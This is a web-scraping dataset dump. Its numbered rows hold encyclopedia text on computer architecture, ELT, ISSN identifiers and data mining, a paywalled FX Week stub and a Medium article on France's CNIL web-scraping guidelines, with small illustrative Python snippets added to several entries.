adding two numbers with just a few button presses. But to add together all of the numbers from 1 to 1,000 would take thousands of button presses and a lot of time, with a near certainty of making a mistake. On the other hand, a computer may be programmed to do this with just a few simple instructions. The following example is written in the MIPS assembly language: Once told to run this program, the computer will perform the repetitive addition task without further human intervention. It will almost never make a mistake and a modern PC can complete the task in a fraction of a second. In most computers, individual instructions are stored as machine code with each instruction being given a unique number (its operation code or opcode for short). 
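The MIPS assembly listing referred to in the scraped text above did not survive extraction and is not reproduced here. Purely as a stand-in illustration in this notebook's language, the loop below performs the same job the passage describes, adding every number from 1 to 1,000 without further human intervention, and cross-checks the result against the arithmetic-series formula.

total = 0
for n in range(1, 1001):
    total += n                     # the repetitive addition a calculator user would dread
print(total)                       # -> 500500

# Cross-check with the closed form n*(n+1)/2:
assert total == 1000 * 1001 // 2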
The command to add two numbers together would have one opcode; the command to multiply them would have a different opcode, and so on. The simplest computers are able to perform any of a handful of different instructions; the more complex computers have several hundred to choose from, each with a unique numerical code. Since the computer's memory is able to store numbers, it can also store the instruction codes. This leads to the important fact that entire programs (which are just lists of these instructions) can be represented as lists of numbers and can themselves be manipulated inside the computer in the same way as numeric data. The fundamental concept of storing programs in the computer's memory alongside the data they operate on is the crux of the von Neumann, or stored program, architecture. 119 120 In some cases, a computer might store some or all of its program in memory that is kept separate from the data it operates on. This is called the Harvard architecture after the Harvard Mark I computer. Modern von Neumann computers display some traits of the Harvard architecture in their designs, such as in CPU caches. While it is possible to write computer programs as long lists of numbers (machine language) and while this technique was used with many early computers, h it is extremely tedious and potentially error-prone to do so in practice, especially for complicated programs. Instead, each basic instruction can be given a short name that is indicative of its function and easy to remember a mnemonic such as ADD, SUB, MULT or JUMP. These mnemonics are collectively known as a computer's assembly language. Converting programs written in assembly language into something the computer can actually understand (machine language) is usually done by a computer program called an assembler. Programming languages provide various ways of specifying programs for computers to run. Unlike natural languages, programming languages are designed to permit no ambiguity and to be concise. They are purely written languages and are often difficult to read aloud. They are generally either translated into machine code by a compiler or an assembler before being run, or translated directly at run time by an interpreter. Sometimes programs are executed by a hybrid method of the two techniques. Machine languages and the assembly languages that represent them (collectively termed low-level programming languages) are generally unique to the particular architecture of a computer's central processing unit (CPU). For instance, an ARM architecture CPU (such as may be found in a smartphone or a hand-held videogame) cannot understand the machine language of an x86 CPU that might be in a PC. i Historically a significant number of other cpu architectures were created and saw extensive use, notably including the MOS Technology 6502 and 6510 in addition to the Zilog Z80. Although considerably easier than in machine language, writing long programs in assembly language is often difficult and is also error prone. Therefore, most practical programs are written in more abstract high-level programming languages that are able to express the needs of the programmer more conveniently (and thereby help reduce programmer error). High level languages are usually "compiled" into machine language (or sometimes into assembly language and then into machine language) using another computer program called a compiler. 
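Following the description above of mnemonics such as ADD, SUB, MULT or JUMP and of the assembler that converts them, here is a toy assembler sketch: it maps mnemonics to numeric opcodes and emits the flat list of numbers that, per the stored-program idea, could sit in memory alongside the data. The opcode values and the source program are invented for the example.

OPCODES = {"LOAD": 0x01, "ADD": 0x02, "SUB": 0x03, "JUMP": 0x04, "HALT": 0xFF}

def assemble(lines):
    """Turn lines like 'ADD 7' into a flat list of numbers (opcode, operands...)."""
    machine_code = []
    for line in lines:
        mnemonic, *operands = line.split()
        machine_code.append(OPCODES[mnemonic])          # the operation code
        machine_code.extend(int(x) for x in operands)   # its numeric operands
    return machine_code

source = ["LOAD 10", "ADD 7", "SUB 3", "HALT"]
print(assemble(source))   # -> [1, 10, 2, 7, 3, 3, 255]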
j High level languages are less related to the workings of the target computer than assembly language, and more related to the language and structure of the problem(s) to be solved by the final program. It is therefore often possible to use different compilers to translate the same high level language program into the machine language of many different types of computer. This is part of the means by which software like video games may be made available for different computer architectures such as personal computers and various video game consoles. Program design of small programs is relatively simple and involves the analysis of the problem, collection of inputs, using the programming constructs within languages, devising or using established procedures and algorithms, providing data for output devices and solutions to the problem as applicable. 121 As problems become larger and more complex, features such as subprograms, modules, formal documentation, and new paradigms such as object-oriented programming are encountered. 122 Large programs involving thousands of line of code and more require formal software methodologies. 123 The task of developing large software systems presents a significant intellectual challenge. 124 Producing software with an acceptably high reliability within a predictable schedule and budget has historically been difficult; 125 the academic and professional discipline of software engineering concentrates specifically on this challenge. 126 Errors in computer programs are called "bugs". They may be benign and not affect the usefulness of the program, or have only subtle effects. However, in some cases they may cause the program or the entire system to "hang", becoming unresponsive to input such as mouse clicks or keystrokes, to completely fail, or to crash. 127 Otherwise benign bugs may sometimes be harnessed for malicious intent by an unscrupulous user writing an exploit, code designed to take advantage of a bug and disrupt a computer's proper execution. Bugs are usually not the fault of the computer. Since computers merely execute the instructions they are given, bugs are nearly always the result of programmer error or an oversight made in the program's design. k Admiral Grace Hopper, an American computer scientist and developer of the first compiler, is credited for having first used the term "bugs" in computing after a dead moth was found shorting a relay in the Harvard Mark II computer in September 1947. 128 Computers have been used to coordinate information between multiple locations since the 1950s. The U.S. military's SAGE system was the first large-scale example of such a system, which led to a number of special-purpose commercial systems such as Sabre. 129 In the 1970s, computer engineers at research institutions throughout the United States began to link their computers together using telecommunications technology. The effort was funded by ARPA (now DARPA), and the computer network that resulted was called the ARPANET. 130 The technologies that made the Arpanet possible spread and evolved. In time, the network spread beyond academic and military institutions and became known as the Internet. The emergence of networking involved a redefinition of the nature and boundaries of the computer. Computer operating systems and applications were modified to include the ability to define and access the resources of other computers on the network, such as peripheral devices, stored information, and the like, as extensions of the resources of an individual computer. 
Initially these facilities were available primarily to people working in high-tech environments, but in the 1990s the spread of applications like e-mail and the World Wide Web, combined with the development of cheap, fast networking technologies like Ethernet and ADSL saw computer networking become almost ubiquitous. In fact, the number of computers that are networked is growing phenomenally. A very large proportion of personal computers regularly connect to the Internet to communicate and receive information. "Wireless" networking, often utilizing mobile phone networks, has meant networking is becoming increasingly ubiquitous even in mobile computing environments. A computer does not need to be electronic, nor even have a processor, nor RAM, nor even a hard disk. While popular usage of the word "computer" is synonymous with a personal electronic computer, l a typical modern definition of a computer is: "A device that computes, especially a programmable usually electronic machine that performs high-speed mathematical or logical operations or that assembles, stores, correlates, or otherwise processes information. 131 According to this definition, any device that processes information qualifies as a computer. There is active research to make non-classical computers out of many promising new types of technology, such as optical computers, DNA computers, neural computers, and quantum computers. Most computers are universal, and are able to calculate any computable function, and are limited only by their memory capacity and operating speed. However different designs of computers can give very different performance for particular problems; for example quantum computers can potentially break some modern encryption algorithms (by quantum factoring) very quickly. There are many types of computer architectures: Of all these abstract machines, a quantum computer holds the most promise for revolutionizing computing. 132 Logic gates are a common abstraction which can apply to most of the above digital or analog paradigms. The ability to store and execute lists of instructions called programs makes computers extremely versatile, distinguishing them from calculators. The Church Turing thesis is a mathematical statement of this versatility: any computer with a minimum capability (being Turing-complete) is, in principle, capable of performing the same tasks that any other computer can perform. Therefore, any type of computer (netbook, supercomputer, cellular automaton, etc.) is able to perform the same computational tasks, given enough time and storage capacity. A computer will solve problems in exactly the way it is programmed to, without regard to efficiency, alternative solutions, possible shortcuts, or possible errors in the code. Computer programs that learn and adapt are part of the emerging field of artificial intelligence and machine learning. Artificial intelligence based products generally fall into two major categories: rule-based systems and pattern recognition systems. Rule-based systems attempt to represent the rules used by human experts and tend to be expensive to develop. Pattern-based systems use data about a problem to generate conclusions. Examples of pattern-based systems include voice recognition, font recognition, translation and the emerging field of on-line marketing. As the use of computers has spread throughout society, there are an increasing number of careers involving computers. 
The need for computers to work well together and to be able to exchange information has spawned the need for many standards organizations, clubs and societies of both a formal and informal nature. |
598 | https://en.wikipedia.org/wiki/Data_scraping | http://www.fxweek.com/fx-week/news/1539599/contributors-fret-about-reuters-plan-to-switch-from-monitor-network-to-idn | The banks who contribute "rates" to Reuters Holdings PLC’s market data services remain in the dark about how they will deliver those rates to Reuters’ Integrated Data Network (IDN) based services once the current mechanism is dismantled. Reuters is in the process of switching delivery of its real-time market data services to IDN from the aging Monitor network. Although the switch from Reuters’ current Monitor contributors’ network is still more than a year away, contributors and systems (The remainder of the scraped page was subscription, paywall, and site-navigation boilerplate with no further article content.) |
599 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Extract,_load,_transform | Extract, load, transform (ELT) is an alternative to extract, transform, load (ETL) used with data lake implementations. In contrast to ETL, in ELT models the data is not transformed on entry to the data lake, but stored in its original raw format. This enables faster loading times. However, ELT requires sufficient processing power within the data processing engine to carry out the transformation on demand, to return the results in a timely manner. 1 2 Since the data is not processed on entry to the data lake, the query and schema do not need to be defined a priori (although often the schema will be available during load since many data sources are extracts from databases or similar structured data systems and hence have an associated schema). ELT is a data pipeline model. 3 4 Some of the benefits of an ELT process include speed and the ability to handle both structured and unstructured data. 5 |
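To make the ELT pattern in the entry above concrete, here is a minimal sketch in Python of a load-then-transform flow: raw extracts land in the lake untouched, and the transformation runs only when a query is made. The directory name, file layout, and pandas-based transform are illustrative assumptions, not anything prescribed by the article.
# Minimal ELT sketch (illustrative): load raw extracts as-is, transform only at query time
import pandas as pd
from pathlib import Path

LAKE = Path("data_lake")              # hypothetical landing zone for raw extracts
LAKE.mkdir(exist_ok=True)

def load_raw(source_name, raw_bytes):
    # "L" step: persist the extract exactly as received; no schema is enforced on entry
    (LAKE / f"{source_name}.csv").write_bytes(raw_bytes)

def transform_on_demand(source_name, columns):
    # "T" step: runs inside the processing engine only when the data is queried
    df = pd.read_csv(LAKE / f"{source_name}.csv")
    return df[columns].dropna()       # example transformation: project columns and drop gaps

# Example: load_raw("orders", b"id,amount\n1,10\n2,\n"); transform_on_demand("orders", ["amount"])
In an ETL pipeline, by contrast, the projection and cleaning step would run before anything is written to storage.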
600 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/ISSN_(identifier) | An International Standard Serial Number (ISSN) is an eight-digit serial number used to uniquely identify a serial publication (periodical), such as a magazine. 1 The ISSN is especially helpful in distinguishing between serials with the same title. ISSNs are used in ordering, cataloging, interlibrary loans, and other practices in connection with serial literature. 2 The ISSN system was first drafted as an International Organization for Standardization (ISO) international standard in 1971 and published as ISO 3297 in 1975. 3 ISO subcommittee TC 46 SC 9 is responsible for maintaining the standard. When a serial with the same content is published in more than one media type, a different ISSN is assigned to each media type. For example, many serials are published both in print and electronic media. The ISSN system refers to these types as print ISSN (p-ISSN) and electronic ISSN (e-ISSN). 4 Consequently, as defined in ISO 3297:2007, every serial in the ISSN system is also assigned a linking ISSN (ISSN-L), typically the same as the ISSN assigned to the serial in its first published medium, which links together all ISSNs assigned to the serial in every medium. 5 An ISSN is an eight-digit code, divided by a hyphen into two four-digit numbers. 1 The last digit, which may be zero through nine or an X, is a check digit, so the ISSN is uniquely represented by its first seven digits. Formally, the general form of the ISSN (also named "ISSN structure" or "ISSN syntax") can be expressed as NNNN-NNNC, where N is a decimal digit character in the set {0, 1, 2, ..., 9} and C is in {0, 1, 2, ..., 9, X}; it can also be expressed by a Perl Compatible Regular Expressions (PCRE) regular expression. 6 For example, the ISSN of the journal Hearing Research is 0378-5955, where the final 5 is the check digit, that is, C = 5. To calculate the check digit, the following algorithm may be used: multiply the first seven digits by the weights 8 through 2 and sum the products, 0·8 + 3·7 + 7·6 + 8·5 + 5·4 + 9·3 + 5·2 = 0 + 21 + 42 + 40 + 20 + 27 + 10 = 160. The remainder of this sum modulo 11 is then calculated: 160 ÷ 11 = 14, remainder 6. If there is no remainder, the check digit is 0; otherwise the remainder is subtracted from 11. If the result is less than 10, it yields the check digit: 11 − 6 = 5. Thus, in this example, the check digit C is 5. To confirm the check digit, calculate the sum of all eight digits of the ISSN multiplied by their position in the number, counting from the right. (If the check digit is X, add 10 to the sum.) The remainder of the sum modulo 11 must be 0. There is an online ISSN checker that can validate an ISSN, based on the above algorithm. 7 ISSNs can be encoded in EAN-13 bar codes with a 977 "country code" (compare the 978 country code ("bookland") for ISBNs), followed by the 7 main digits of the ISSN (the check digit is not included), followed by 2 publisher-defined digits, followed by the EAN check digit (which need not match the ISSN check digit). 8 ISSN codes are assigned by a network of ISSN National Centres, usually located at national libraries and coordinated by the ISSN International Centre based in Paris. The International Centre is an intergovernmental organization created in 1974 through an agreement between UNESCO and the French government. 
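The check-digit arithmetic in the ISSN entry above maps directly to code. Below is a minimal sketch in Python; the function names and the regular expression for the NNNN-NNNC form are my own illustrative choices, not taken from ISO 3297.
import re

ISSN_FORM = re.compile(r"^\d{4}-\d{3}[\dX]$")   # assumed illustrative pattern for NNNN-NNNC

def issn_check_digit(first_seven):
    # Weight the first seven digits 8, 7, ..., 2 from left to right and sum the products
    total = sum(int(d) * w for d, w in zip(first_seven, range(8, 1, -1)))
    remainder = total % 11
    if remainder == 0:
        return "0"
    value = 11 - remainder
    return "X" if value == 10 else str(value)   # a result of 10 is written as X

def is_valid_issn(issn):
    if not ISSN_FORM.match(issn):
        return False
    digits = issn.replace("-", "")
    return issn_check_digit(digits[:7]) == digits[-1]

print(issn_check_digit("0378595"))   # -> 5, matching the Hearing Research example above
print(is_valid_issn("0378-5955"))    # -> True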
ISSN-L is a unique identifier for all versions of the serial containing the same content across different media. As defined by ISO 3297:2007, the "linking ISSN (ISSN-L)" provides a mechanism for collocation or linking among the different media versions of the same continuing resource. The ISSN-L is one of a serial's existing ISSNs, so does not change the use or assignment of "ordinary" ISSNs; 9 it is based on the ISSN of the first published medium version of the publication. If the print and online versions of the publication are published at the same time, the ISSN of the print version is chosen as the basis of the ISSN-L. With ISSN-L it is possible to designate one single ISSN for all media versions of the title. The use of ISSN-L facilitates search, retrieval and delivery across all media versions for services like OpenURL, library catalogues, search engines or knowledge bases. The International Centre maintains a database of all ISSNs assigned worldwide, the ISDS Register (International Serials Data System), otherwise known as the ISSN Register. At the end of 2016, the ISSN Register contained records for 1,943,572 items. 10 The Register is not freely available for interrogation on the web, but is available by subscription. ISSN and ISBN codes are similar in concept, but ISBNs are assigned to individual books. An ISBN might be assigned for particular issues of a serial, in addition to the ISSN code for the serial as a whole. An ISSN, unlike the ISBN code, is an anonymous identifier associated with a serial title, containing no information as to the publisher or its location. For this reason a new ISSN is assigned to a serial each time it undergoes a major title change. Since the ISSN applies to an entire serial, other identifiers have been built on top of it to allow references to specific volumes, articles, or other identifiable components (like the table of contents): the Publisher Item Identifier (PII) and the Serial Item and Contribution Identifier (SICI). Separate ISSNs are needed for serials in different media (except reproduction microforms). Thus, the print and electronic media versions of a serial need separate ISSNs, 11 and CD-ROM versions and web versions require different ISSNs. However, the same ISSN can be used for different file formats (e.g. PDF and HTML) of the same online serial. This "media-oriented identification" of serials made sense in the 1970s. In the 1990s and onward, with personal computers, better screens, and the Web, it makes sense to consider only content, independent of media. This "content-oriented identification" of serials remained an unmet demand for a decade, but no ISSN update or initiative occurred. A natural extension for ISSN, the unique identification of the articles in the serials, was the main demanded application. An alternative serials' contents model arrived with the indecs Content Model and its application, the digital object identifier (DOI), an ISSN-independent initiative, consolidated in the 2000s. Only later, in 2007, ISSN-L was defined in the new ISSN standard (ISO 3297:2007) as an "ISSN designated by the ISSN Network to enable collocation or linking among the different media versions of a continuing resource". 12 An ISSN can be encoded as a uniform resource name (URN) by prefixing it with "urn:ISSN:". 6 For example, Rail could be referred to as "urn:ISSN:0953-4563". URN namespaces are case-sensitive, and the ISSN namespace is all caps. 13 If the checksum digit is "X" then it is always encoded in uppercase in a URN. 
The URNs are content-oriented, but ISSN is media-oriented: A unique URN for serials simplifies the search, recovery and delivery of data for various services including, in particular, search systems and knowledge databases. 12 ISSN-L (see Linking ISSN above) was created to fill this gap. The two standard categories of media in which serials are most available are print and electronic. In metadata contexts (e.g., JATS), these may have standard labels. p-ISSN is a standard label for "Print ISSN", the ISSN for the print media (paper) version of a serial. Usually it is the "default media" and so the "default ISSN". e-ISSN (or eISSN) is a standard label for "Electronic ISSN", the ISSN for the electronic media (online) version of a serial. 15 |
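The URN convention described at the end of the ISSN entry (the "urn:ISSN:" prefix, an all-caps namespace, and an uppercase X check digit) can be captured in a small helper. This assumes the is_valid_issn function from the earlier sketch is in scope and is illustrative only.
def issn_to_urn(issn):
    # URN namespaces are case-sensitive; the ISSN namespace and an X check digit are upper case
    issn = issn.strip().upper()
    if not is_valid_issn(issn):                  # helper from the previous sketch (assumed in scope)
        raise ValueError(f"not a valid ISSN: {issn}")
    return f"urn:ISSN:{issn}"

print(issn_to_urn("0378-5955"))   # -> urn:ISSN:0378-5955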
601 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Special:RecentChangesLinked/Web_scraping | (Scraped page was a MediaWiki "Related changes" utility page; it contained no article content.) |
602 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_mining | Data mining is the process of extracting and discovering patterns in large data sets involving methods at the intersection of machine learning, statistics, and database systems. 1 Data mining is an interdisciplinary subfield of computer science and statistics with an overall goal of extracting information (with intelligent methods) from a data set and transforming the information into a comprehensible structure for further use. 1 2 3 4 Data mining is the analysis step of the "knowledge discovery in databases" process, or KDD. 5 Aside from the raw analysis step, it also involves database and data management aspects, data pre-processing, model and inference considerations, interestingness metrics, complexity considerations, post-processing of discovered structures, visualization, and online updating. 1 The term "data mining" is a misnomer because the goal is the extraction of patterns and knowledge from large amounts of data, not the extraction (mining) of data itself. 6 It also is a buzzword 7 and is frequently applied to any form of large-scale data or information processing (collection, extraction, warehousing, analysis, and statistics) as well as any application of computer decision support system, including artificial intelligence (e.g., machine learning) and business intelligence. Often the more general terms (large scale) data analysis and analytics—or, when referring to actual methods, artificial intelligence and machine learning—are more appropriate. The actual data mining task is the semi-automatic or automatic analysis of large quantities of data to extract previously unknown, interesting patterns such as groups of data records (cluster analysis), unusual records (anomaly detection), and dependencies (association rule mining, sequential pattern mining). This usually involves using database techniques such as spatial indices. These patterns can then be seen as a kind of summary of the input data, and may be used in further analysis or, for example, in machine learning and predictive analytics. For example, the data mining step might identify multiple groups in the data, which can then be used to obtain more accurate prediction results by a decision support system. Neither the data collection, data preparation, nor result interpretation and reporting is part of the data mining step, although they do belong to the overall KDD process as additional steps. The difference between data analysis and data mining is that data analysis is used to test models and hypotheses on the dataset, e.g., analyzing the effectiveness of a marketing campaign, regardless of the amount of data. In contrast, data mining uses machine learning and statistical models to uncover clandestine or hidden patterns in a large volume of data. 8 The related terms data dredging, data fishing, and data snooping refer to the use of data mining methods to sample parts of a larger population data set that are (or may be) too small for reliable statistical inferences to be made about the validity of any patterns discovered. These methods can, however, be used in creating new hypotheses to test against the larger data populations. In the 1960s, statisticians and economists used terms like data fishing or data dredging to refer to what they considered the bad practice of analyzing data without an a-priori hypothesis. 
The term "data mining" was used in a similarly critical way by economist Michael Lovell in an article published in the Review of Economic Studies in 1983. 9 10 Lovell indicates that the practice "masquerades under a variety of aliases, ranging from "experimentation" (positive) to "fishing" or "snooping" (negative). The term data mining appeared around 1990 in the database community, with generally positive connotations. For a short time in 1980s, the phrase "database mining" , was used, but since it was trademarked by HNC, a San Diego-based company, to pitch their Database Mining Workstation; 11 researchers consequently turned to data mining. Other terms used include data archaeology, information harvesting, information discovery, knowledge extraction, etc. Gregory Piatetsky-Shapiro coined the term "knowledge discovery in databases" for the first workshop on the same topic (KDD 1989) and this term became more popular in the AI and machine learning communities. However, the term data mining became more popular in the business and press communities. 12 Currently, the terms data mining and knowledge discovery are used interchangeably. The manual extraction of patterns from data has occurred for centuries. Early methods of identifying patterns in data include Bayes' theorem (1700s) and regression analysis (1800s). 13 The proliferation, ubiquity and increasing power of computer technology have dramatically increased data collection, storage, and manipulation ability. As data sets have grown in size and complexity, direct "hands-on" data analysis has increasingly been augmented with indirect, automated data processing, aided by other discoveries in computer science, specially in the field of machine learning, such as neural networks, cluster analysis, genetic algorithms (1950s), decision trees and decision rules (1960s), and support vector machines (1990s). Data mining is the process of applying these methods with the intention of uncovering hidden patterns. 14 in large data sets. It bridges the gap from applied statistics and artificial intelligence (which usually provide the mathematical background) to database management by exploiting the way data is stored and indexed in databases to execute the actual learning and discovery algorithms more efficiently, allowing such methods to be applied to ever-larger data sets. The knowledge discovery in databases (KDD) process is commonly defined with the stages: It exists, however, in many variations on this theme, such as the Cross-industry standard process for data mining (CRISP-DM) which defines six phases: or a simplified process such as (1) Pre-processing, (2) Data Mining, and (3) Results Validation. Polls conducted in 2002, 2004, 2007 and 2014 show that the CRISP-DM methodology is the leading methodology used by data miners. 15 16 17 18 The only other data mining standard named in these polls was SEMMA. However, 3 4 times as many people reported using CRISP-DM. Several teams of researchers have published reviews of data mining process models, 19 and Azevedo and Santos conducted a comparison of CRISP-DM and SEMMA in 2008. 20 Before data mining algorithms can be used, a target data set must be assembled. As data mining can only uncover patterns actually present in the data, the target data set must be large enough to contain these patterns while remaining concise enough to be mined within an acceptable time limit. A common source for data is a data mart or data warehouse. 
Pre-processing is essential to analyze the multivariate data sets before data mining. The target set is then cleaned. Data cleaning removes the observations containing noise and those with missing data. Data mining involves six common classes of tasks: 5 Data mining can unintentionally be misused, producing results that appear to be significant but which do not actually predict future behavior and cannot be reproduced on a new sample of data, therefore bearing little use. This is sometimes caused by investigating too many hypotheses and not performing proper statistical hypothesis testing. A simple version of this problem in machine learning is known as overfitting, but the same problem can arise at different phases of the process and thus a train test split—when applicable at all—may not be sufficient to prevent this from happening. 21 The final step of knowledge discovery from data is to verify that the patterns produced by the data mining algorithms occur in the wider data set. Not all patterns found by the algorithms are necessarily valid. It is common for data mining algorithms to find patterns in the training set which are not present in the general data set. This is called overfitting. To overcome this, the evaluation uses a test set of data on which the data mining algorithm was not trained. The learned patterns are applied to this test set, and the resulting output is compared to the desired output. For example, a data mining algorithm trying to distinguish "spam" from "legitimate" e-mails would be trained on a training set of sample e-mails. Once trained, the learned patterns would be applied to the test set of e-mails on which it had not been trained. The accuracy of the patterns can then be measured from how many e-mails they correctly classify. Several statistical methods may be used to evaluate the algorithm, such as ROC curves. If the learned patterns do not meet the desired standards, it is necessary to re-evaluate and change the pre-processing and data mining steps. If the learned patterns do meet the desired standards, then the final step is to interpret the learned patterns and turn them into knowledge. The premier professional body in the field is the Association for Computing Machinery's (ACM) Special Interest Group (SIG) on Knowledge Discovery and Data Mining (SIGKDD). 22 23 Since 1989, this ACM SIG has hosted an annual international conference and published its proceedings, 24 and since 1999 it has published a biannual academic journal titled "SIGKDD Explorations". 25 Computer science conferences on data mining include: Data mining topics are also present in many data management database conferences such as the ICDE Conference, SIGMOD Conference and International Conference on Very Large Data Bases. There have been some efforts to define standards for the data mining process, for example, the 1999 European Cross Industry Standard Process for Data Mining (CRISP-DM 1.0) and the 2004 Java Data Mining standard (JDM 1.0). Development on successors to these processes (CRISP-DM 2.0 and JDM 2.0) was active in 2006 but has stalled since. JDM 2.0 was withdrawn without reaching a final draft. For exchanging the extracted models—in particular for use in predictive analytics—the key standard is the Predictive Model Markup Language (PMML), which is an XML-based language developed by the Data Mining Group (DMG) and supported as exchange format by many data mining applications. 
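The evaluation loop described above, training on one sample of e-mails and then scoring the learned patterns on a held-out test set, can be sketched in a few lines. The snippet uses scikit-learn, which the article does not mention and is assumed here purely for illustration; the toy e-mail corpus is invented.
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.metrics import accuracy_score

# Invented toy corpus: 1 = spam, 0 = legitimate
emails = ["win money now", "cheap pills online", "meeting at noon",
          "quarterly report attached", "claim your free prize now", "lunch tomorrow?"]
labels = [1, 1, 0, 0, 1, 0]

# Hold out e-mails the model never sees during training, as the evaluation step requires
train_x, test_x, train_y, test_y = train_test_split(emails, labels, test_size=0.33, random_state=0)

vectorizer = CountVectorizer()
model = MultinomialNB().fit(vectorizer.fit_transform(train_x), train_y)

# Apply the learned patterns to the unseen e-mails and measure how many are classified correctly
predictions = model.predict(vectorizer.transform(test_x))
print("test accuracy:", accuracy_score(test_y, predictions))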
As the name suggests, it only covers prediction models, a particular data mining task of high importance to business applications. However, extensions to cover (for example) subspace clustering have been proposed independently of the DMG. 26 Data mining is used wherever there is digital data available. Notable examples of data mining can be found throughout business, medicine, science, finance, construction, and surveillance. While the term "data mining" itself may have no ethical implications, it is often associated with the mining of information in relation to user behavior (ethical and otherwise). 27 The ways in which data mining can be used can in some cases and contexts raise questions regarding privacy, legality, and ethics. 28 In particular, data mining government or commercial data sets for national security or law enforcement purposes, such as in the Total Information Awareness Program or in ADVISE, has raised privacy concerns. 29 30 Data mining requires data preparation which uncovers information or patterns which compromise confidentiality and privacy obligations. A common way for this to occur is through data aggregation. Data aggregation involves combining data together (possibly from various sources) in a way that facilitates analysis (but that also might make identification of private, individual-level data deducible or otherwise apparent). 31 This is not data mining per se, but a result of the preparation of data before—and for the purposes of—the analysis. The threat to an individual's privacy comes into play when the data, once compiled, cause the data miner, or anyone who has access to the newly compiled data set, to be able to identify specific individuals, especially when the data were originally anonymous. 32 It is recommended to be aware of the following before data are collected: 31 Data may also be modified so as to become anonymous, so that individuals may not readily be identified. 31 However, even "anonymized" data sets can potentially contain enough information to allow identification of individuals, as occurred when journalists were able to find several individuals based on a set of search histories that were inadvertently released by AOL. 33 The inadvertent revelation of personally identifiable information by the provider violates Fair Information Practices. This indiscretion can cause financial, emotional, or bodily harm to the indicated individual. In one instance of privacy violation, the patrons of Walgreens filed a lawsuit against the company in 2011 for selling prescription information to data mining companies who in turn provided the data to pharmaceutical companies. 34 Europe has rather strong privacy laws, and efforts are underway to further strengthen the rights of consumers. However, the U.S.-E.U. Safe Harbor Principles, developed between 1998 and 2000, currently effectively expose European users to privacy exploitation by U.S. companies. As a consequence of Edward Snowden's global surveillance disclosure, there has been increased discussion to revoke this agreement, as in particular the data will be fully exposed to the National Security Agency, and attempts to reach an agreement with the United States have failed. 35 In the United Kingdom in particular there have been cases of corporations using data mining as a way to target certain groups of customers, forcing them to pay unfairly high prices. 
These groups tend to be people of lower socio-economic status who are not savvy to the ways they can be exploited in digital market places. 36 In the United States, privacy concerns have been addressed by the US Congress via the passage of regulatory controls such as the Health Insurance Portability and Accountability Act (HIPAA). The HIPAA requires individuals to give their "informed consent" regarding information they provide and its intended present and future uses. According to an article in Biotech Business Week, i n practice, HIPAA may not offer any greater protection than the longstanding regulations in the research arena, says the AAHC. More importantly, the rule's goal of protection through informed consent is approach a level of incomprehensibility to average individuals. 37 This underscores the necessity for data anonymity in data aggregation and mining practices. U.S. information privacy legislation such as HIPAA and the Family Educational Rights and Privacy Act (FERPA) applies only to the specific areas that each such law addresses. The use of data mining by the majority of businesses in the U.S. is not controlled by any legislation. Under European copyright database laws, the mining of in-copyright works (such as by web mining) without the permission of the copyright owner is not legal. Where a database is pure data in Europe, it may be that there is no copyright—but database rights may exist, so data mining becomes subject to intellectual property owners' rights that are protected by the Database Directive. On the recommendation of the Hargreaves review, this led to the UK government to amend its copyright law in 2014 to allow content mining as a limitation and exception. 38 The UK was the second country in the world to do so after Japan, which introduced an exception in 2009 for data mining. However, due to the restriction of the Information Society Directive (2001), the UK exception only allows content mining for non-commercial purposes. UK copyright law also does not allow this provision to be overridden by contractual terms and conditions. Since 2020 also Switzerland has been regulating data mining by allowing it in the research field under certain conditions laid down by art. 24d of the Swiss Copyright Act. This new article entered into force on 1 April 2020. 39 The European Commission facilitated stakeholder discussion on text and data mining in 2013, under the title of Licences for Europe. 40 The focus on the solution to this legal issue, such as licensing rather than limitations and exceptions, led to representatives of universities, researchers, libraries, civil society groups and open access publishers to leave the stakeholder dialogue in May 2013. 41 US copyright law, and in particular its provision for fair use, upholds the legality of content mining in America, and other fair use countries such as Israel, Taiwan and South Korea. As content mining is transformative, that is it does not supplant the original work, it is viewed as being lawful under fair use. For example, as part of the Google Book settlement the presiding judge on the case ruled that Google's digitization project of in-copyright books was lawful, in part because of the transformative uses that the digitization project displayed—one being text and data mining. 42 The following applications are available under free open-source licenses. Public access to application source code is also available. The following applications are available under proprietary licenses. 
For more information about extracting information out of data (as opposed to analyzing data), see: |
603 | https://en.wikipedia.org/wiki/Web_scraping | https://medium.com/@finddatalab/can-you-still-perform-web-scraping-with-the-new-cnil-guidelines-bf3e20d0edc2 | The General Data Protection Regulation (GDPR) is a law that deals with data privacy and security in the European Union. It affects companies anywhere in the world if they target or collect data from people living in the European Union. The GDPR went into effect on May 25, 2018, and carries large fines for those who break it. While the GDPR went into effect a couple of years ago, data and web scraping are still a topic of discussion in some European Union countries. One of those countries is France; the French Data Protection Authority (CNIL) released new guidelines on web scraping. These new guidelines demonstrate the level of care companies must take in complying with the GDPR. They set in place specific procedures that companies which perform web scraping must follow in order to maintain compliance with the GDPR. This includes companies that collect data on publicly available websites. Conforming to these new guidelines ensures that any company and its vendors perform the necessary procedures to fully comply with all GDPR requirements. What Are The New CNIL Guidelines? The CNIL guidelines made it clear that publicly available data is still personal data. These new guidelines were released on April 30, 2020. This means that any publicly available personal data cannot be repurposed without the knowledge of the person to whom that data belongs. These new guidelines have the potential to impact every French citizen, as well as the companies that are collecting data, as they allow French citizens to opt out of having their data collected. They have also created clear procedures which every business must follow when collecting data. Obtaining Unequivocal Consent To Reuse Publicly Available Private Data One important aspect to understand when it comes to web scraping is what it means to get unequivocal consent and how you can get unequivocal consent as a web scraper. Unequivocal consent means that you are given very clear and very firm consent to perform a specific task. There are several ways for a web scraper to get unequivocal consent and some rules regarding this. For starters, the users must receive all relevant information in regard to what information is collected and what it will be used for. It is recommended that web scrapers provide the following information to anyone whose data they collect: This information must be clear, easily accessible, and exhaustive before a company is able to gain someone’s consent. The CNIL follows the GDPR criteria for consent and has given the following recommendations. For starters, the consent should be individual for each purpose. For web scrapers, this means having a distinct data set for each purpose, as well as clearly defining that purpose. The CNIL also recommends that users are able to consent or refuse consent with equal simplicity. Also, if a user does not give their consent for data collection, they cannot be asked again for a specified period of time. Consent should also be renewed at an appropriate interval of time. Performing a Data Protection Impact Assessment You do not need to perform a data protection impact assessment every time 